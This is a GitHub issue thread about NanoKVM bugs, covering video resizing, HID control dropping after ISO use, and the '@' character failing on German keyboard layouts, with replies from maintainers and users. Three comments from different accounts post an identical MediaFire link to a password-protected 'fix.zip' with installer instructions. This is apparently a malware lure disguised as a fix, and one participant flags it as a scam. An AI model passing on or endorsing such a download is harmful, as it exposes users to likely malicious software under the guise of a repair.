sipeed/NanoKVM #20: Things I would like to see ironed out before release

jcastro, 2024-08-26:
Hi!
I have been using the NanoKVM for a few days, quite a bit, and I've found some things that would be nice to be improved or things that are not working very well. Just wanted to put it on your radar

1. Resizing the browser window doesn't resize the video feed, which makes it hard to see what's on screen (it adds scroll bars instead)
[image]

2. Enabling and disabling an ISO seems to disable the mouse/keyboard control. You need to manually restart the HID service
https://github.com/user-attachments/assets/fd7c5dfd-1983-4ade-b8fe-68425a849ccd

3. Impossible to add the "@" character and it's crucial for some installation or accessing through SSH. It seems that my keyboard is not being recognized correctly but even from the virtual keyboard it's not possible. IMHO this is really important!

4. Sometimes the video feed just stops responding and needs to be refreshed in the browser. Also, the Frame Detect functionality seems to do more harm than good in my experience!

Thanks and hope it helps!

sunshinezxq, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Lxx-c, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

polyzium, 2024-08-26:
Excuse me, what the hell are those spam/scam comments?

polyzium, 2024-08-26:
> Resizing the browser window doesn't resize the video feed, which makes it hard to see what's on screen (it adds scroll bars instead)

I could probably make a PR to fix this.

> Enabling and disabling an ISO seems to disable the mouse/keyboard control. You need to manually restart the HID service

The USB gadget is considered as one device, so everything including the mouse/keyboard and USB mass storage is transferred through this device.

> Impossible to add the "@" character and it's crucial for some installation or accessing through SSH.

Could you please elaborate more on that?

> It seems that my keyboard is not being recognized correctly but even from the virtual keyboard it's not possible.

I had some compatibility problems with the entire HID subsystem, probably due to the dual absolute/relative mode. I've heard that PiKVM has relative/absolute switch disabled by default because of this.

> Sometimes the video feed just stops responding and needs to be refreshed in the browser.

I never experienced that, but if it stops after changing resolutions and not even refreshing works, see this issue: https://github.com/sipeed/NanoKVM/issues/5

> Also, the Frame Detect functionality seems to do more harm than good in my experience!

It is to save the bandwidth if you're accessing the NanoKVM over the internet. Feel free to disable if you're using on LAN.

abdulhkeemGit, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

jcastro, 2024-08-26:
> I could probably make a PR to fix this.
>
>
> The USB gadget is considered as one device, so everything including the mouse/keyboard and USB mass storage is transferred through this device.
I guess it might be good to trigger that restart automatically then? Not experiencing the same with PiKVM software!

> 
> > Impossible to add the "@" character and it's crucial for some installation or accessing through SSH.
> 
> Could you please elaborate more on that?
I'm not able to write through the nanokvm the @ character, even using the virtual keyboard
> I had some compatibility problems with the entire HID subsystem, probably due to the dual absolute/relative mode. I've heard that PiKVM has relative/absolute switch disabled by default because of [...]

wj-xiao, 2024-08-27:
Can you provide more information:
- NanoKVM version (click setting -> About NanoKVM).
- Remote host system information.

jcastro, 2024-08-27:
Sure! Remote host is Proxmox VE 8.2
[image]

polyzium, 2024-09-06:
> Resizing the browser window doesn't resize the video feed, which makes it hard to see what's on screen (it adds scroll bars instead)

Done, will be part of the next release.

SonicAndSmoke, 2024-11-10:
> > Impossible to add the "@" character and it's crucial for some installation or accessing through SSH.
> > Could you please elaborate more on that?
> 
> I'm not able to write through the nanokvm the @ character, even using the virtual keyboard

Same for me. I can't write the @ character neither using the virtual keyboard, nor using the "paste" function. If i copy the @ char into the "paste" box and send it, the " char will appear on the remote host. Where Shift + 2 gives you @ on a english keyboard, doing this on a german keyboard gives you the " char. 
On a german keyboard, @ is the third option on the Q key, but neither pressing "Alt Gr + Q" nor "Ctrl + Alt +Q" gives me the @ char, but only a small q character.

[image]

doge-of-the-day, 2024-12-16:
I did experience something similar. I am running the latest version of NanoKVM.
The system the KVM is attached to uses a German keyboard layout and the system I access the KVM GUI via is also using this. Somehow the translation of "altgr+<key>" is not working for special characters.
When changing the layout in the KVM attached system to US it is working very nicely.
Some hint, how to get the translation would be more than great :) Thx :)